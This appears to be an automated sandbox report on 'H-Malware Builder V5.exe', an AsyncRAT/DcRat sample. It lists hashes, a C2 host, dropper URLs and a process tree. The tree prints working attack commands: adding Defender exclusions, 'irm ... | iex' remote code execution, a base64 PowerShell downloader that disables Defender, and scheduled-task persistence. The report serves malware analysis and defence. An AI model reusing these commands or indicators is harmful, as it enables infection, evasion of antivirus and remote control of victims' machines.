Resubmissions

04-12-2024 07:47

241204-jmh8dsyjgs 10

03-12-2024 09:46

241203-lrs99szmav 10

Analysis

  • max time kernel
    134s
  • max time network
    149s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241023-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    04-12-2024 07:47

General

  • Target

    H-Malware Builder V5.exe

  • Size

    407KB

  • MD5

    c8f6d76b4ae82978272bde392561c4f4

  • SHA1

    80447d36fcf88cc9caa806db53e22d9468cc31ee

  • SHA256

    c981ebcf0c0cf857162ae35b9385c22d3198c2ec9ea00e37fcfe74a79eb3510e

  • SHA512

    10fa87f050a9ceb658e443317158ef8b1dbaa9e183ec61b5e5e42adb562f7918d996134aba7f0bbad852def4d6b0824c7b9716628b554194d0fd95974de6b2ad

  • SSDEEP

    12288:r5p4UNBN3aqeKNoRfwoZrHMBV9EwEcb8+DvtuWUb:r9N3aqPCRooZwBjEhcYcvYWUb

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://github.com/MalwareTeam/SecurityHealthService/raw/main/SecurityHealthService.exe

exe.dropper

https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

C2

bay-helps.gl.at.ply.gg:36538

Mutex

DcRatMutex_qwqdanchun

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Async RAT payload 2 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 38 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 36 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 33 IoCs
  • Executes dropped EXE 1 IoCs
  • Drops file in System32 directory 14 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 7 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 33 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:640
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:1028
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{0446f595-eaee-4d59-a113-e545f0b220dd}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1664
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:692
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
        1⤵
          PID:972
        • C:\Windows\System32\svchost.exe
          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
          1⤵
            PID:476
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
            1⤵
              PID:764
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
              1⤵
                PID:436
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                1⤵
                  PID:1060
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                  1⤵
                    PID:1084
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1224
                    • C:\Windows\system32\taskhostw.exe
                      taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                      2⤵
                        PID:3256
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                      1⤵
                        PID:1244
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                        1⤵
                          PID:1340
                        • C:\Windows\System32\svchost.exe
                          C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                          1⤵
                            PID:1380
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                            1⤵
                              PID:1392
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                              1⤵
                                PID:1424
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                1⤵
                                  PID:1556
                                  • C:\Windows\system32\sihost.exe
                                    sihost.exe
                                    2⤵
                                      PID:3192
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                    1⤵
                                      PID:1572
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                      1⤵
                                        PID:1616
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                        1⤵
                                          PID:1652
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                          1⤵
                                            PID:1728
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                            1⤵
                                              PID:1816
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                              1⤵
                                                PID:1836
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                1⤵
                                                  PID:1952
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                  1⤵
                                                    PID:2016
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:2028
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                      1⤵
                                                        PID:2044
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                        1⤵
                                                          PID:1848
                                                        • C:\Windows\System32\spoolsv.exe
                                                          C:\Windows\System32\spoolsv.exe
                                                          1⤵
                                                            PID:2140
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                            1⤵
                                                              PID:2248
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                              1⤵
                                                                PID:2260
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                1⤵
                                                                  PID:2436
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                  1⤵
                                                                    PID:2444
                                                                  • C:\Windows\System32\svchost.exe
                                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                    1⤵
                                                                      PID:2512
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                      1⤵
                                                                      • Drops file in System32 directory
                                                                      • Modifies data under HKEY_USERS
                                                                      PID:2560
                                                                    • C:\Windows\sysmon.exe
                                                                      C:\Windows\sysmon.exe
                                                                      1⤵
                                                                        PID:2672
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                        1⤵
                                                                          PID:2684
                                                                        • C:\Windows\System32\svchost.exe
                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                          1⤵
                                                                            PID:2712
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                            1⤵
                                                                              PID:2724
                                                                            • C:\Windows\system32\wbem\unsecapp.exe
                                                                              C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                              1⤵
                                                                                PID:1296
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                1⤵
                                                                                  PID:3208
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                  1⤵
                                                                                    PID:3316
                                                                                  • C:\Windows\Explorer.EXE
                                                                                    C:\Windows\Explorer.EXE
                                                                                    1⤵
                                                                                    • Suspicious behavior: GetForegroundWindowSpam
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:3504
                                                                                    • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                      2⤵
                                                                                      • Checks computer location settings
                                                                                      • Drops startup file
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:984
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                        3⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:5052
                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
                                                                                        3⤵
                                                                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                        • Checks computer location settings
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of SetThreadContext
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:2648
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
                                                                                          4⤵
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:856
                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            5⤵
                                                                                              PID:1920
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell "irm pastie.io/raw/fgaazw | iex"
                                                                                              5⤵
                                                                                              • Blocklisted process makes network request
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:1140
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAGUAdAB0AGkAbgBnAHMAIAA9ACAAJwB7ACIAVwBEACIAOgAgAGYAYQBsAHMAZQAsACAAIgBhAGQAbQBpAG4AcgB1AG4AIgA6ACAAZgBhAGwAcwBlAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsAJAByAGEAbgBkAG8AbQBTAHQAcgBpAG4AZwAgAD0AIAAiAGEAbQBkAHIAMQBpAHkAbAB0AFQAIgA7AGkAZgAgACgAJABzAGUAdAB0AGkAbgBnAHMALgBXAEQAKQAgAHsAJABzAGUAdAB0AGkAbgBnAHMALgBhAGQAbQBpAG4AcgB1AG4AIAA9ACAAJAB0AHIAdQBlADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBuAGkAbgBoAHAAbgAxADMAMwA3AC8ARABpAHMAYQBiAGwAZQAtAFcAaQBuAGQAbwB3AHMALQBEAGUAZgBlAG4AZABlAHIALwBtAGEAaQBuAC8AcwBvAHUAcgBjAGUALgBiAGEAdAAnACwAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AOwBpAGYAIAAoACQAcwBlAHQAdABpAG4AZwBzAC4AYQBkAG0AaQBuAHIAdQBuACkAIAB7ACQAdQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAE0AYQBsAHcAYQByAGUAVABlAGEAbQAvAFMAZQBjAHUAcgBpAHQAeQBIAGUAYQBsAHQAaABTAGUAcgB2AGkAYwBlAC8AcgBhAHcALwBtAGEAaQBuAC8AUwBlAGMAdQByAGkAdAB5AEgAZQBhAGwAdABoAFMAZQByAHYAaQBjAGUALgBlAHgAZQAnADsAJABvAHUAdABwAHUAdABQAGEAdABoACAAPQAgACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACcAXAAnACAAKwAgACcAUwBlAGMAdQByAGkAdAB5AEgAZQBhAGwAdABoAFMAZQByAHYAaQBjAGUALgBlAHgAZQAnADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAdQByAGwALAAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AZQBsAHMAZQAgAHsAJAB1AHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8ATQBhAGwAdwBhAHIAZQBUAGUAYQBtAC8AUwBlAGMAdQByAGkAdAB5AEgAZQBhAGwAdABoAFMAZQByAHYAaQBjAGUALwByAGEAdwAvAG0AYQBpAG4ALwBTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwBlAHIAdgBpAGMAZQAuAGUAeABlACcAOwAkAG8AdQB0AHAAdQB0AFAAYQB0AGgAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcACcAIAArACAAJwBTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwBlAHIAdgBpAGMAZQAuAGUAeABlACcAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABvAHUAdABwAHUAdABQAGEAdABoACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABvAHUAdABwAHUAdABQAGEAdABoADsAfQA=
                                                                                                6⤵
                                                                                                • Blocklisted process makes network request
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:4760
                                                                                          • C:\Windows\SYSTEM32\SCHTASKS.exe
                                                                                            "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
                                                                                            4⤵
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:3076
                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              5⤵
                                                                                                PID:2720
                                                                                            • C:\Windows\SYSTEM32\SCHTASKS.exe
                                                                                              "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
                                                                                              4⤵
                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                              PID:3376
                                                                                          • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                            3⤵
                                                                                            • Checks computer location settings
                                                                                            • Drops startup file
                                                                                            PID:4068
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                              4⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:460
                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                5⤵
                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                PID:2532
                                                                                            • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                              4⤵
                                                                                              • Checks computer location settings
                                                                                              • Drops startup file
                                                                                              PID:1824
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                5⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:2952
                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  6⤵
                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                  PID:852
                                                                                              • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                5⤵
                                                                                                • Checks computer location settings
                                                                                                • Drops startup file
                                                                                                PID:2912
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                  6⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  PID:4660
                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    7⤵
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    PID:3304
                                                                                                • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                  6⤵
                                                                                                  • Checks computer location settings
                                                                                                  • Drops startup file
                                                                                                  PID:1332
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                    7⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    PID:5024
                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      8⤵
                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                      PID:4424
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                    7⤵
                                                                                                    • Checks computer location settings
                                                                                                    • Drops startup file
                                                                                                    PID:2956
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                      8⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      PID:4828
                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        9⤵
                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                        PID:1684
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                      8⤵
                                                                                                      • Checks computer location settings
                                                                                                      • Drops startup file
                                                                                                      PID:4760
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                        9⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        PID:4668
                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          10⤵
                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                          PID:4976
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                        9⤵
                                                                                                        • Checks computer location settings
                                                                                                        • Drops startup file
                                                                                                        PID:1212
                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                          10⤵
                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          PID:3100
                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            11⤵
                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                            PID:2952
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                          10⤵
                                                                                                          • Checks computer location settings
                                                                                                          • Drops startup file
                                                                                                          PID:2520
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                            11⤵
                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                            PID:2088
                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              12⤵
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:448
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                            11⤵
                                                                                                            • Checks computer location settings
                                                                                                            • Drops startup file
                                                                                                            PID:5032
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                              12⤵
                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                              PID:2080
                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                13⤵
                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                PID:3020
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                              12⤵
                                                                                                              • Checks computer location settings
                                                                                                              • Drops startup file
                                                                                                              PID:2968
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                13⤵
                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                PID:3612
                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  14⤵
                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                  PID:2060
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                13⤵
                                                                                                                • Checks computer location settings
                                                                                                                • Drops startup file
                                                                                                                PID:1300
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                  14⤵
                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                  PID:5080
                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    15⤵
                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                    PID:2976
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                  14⤵
                                                                                                                  • Checks computer location settings
                                                                                                                  • Drops startup file
                                                                                                                  PID:4208
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                    15⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    PID:5040
                                                                                                                    • C:\Windows\System32\Conhost.exe
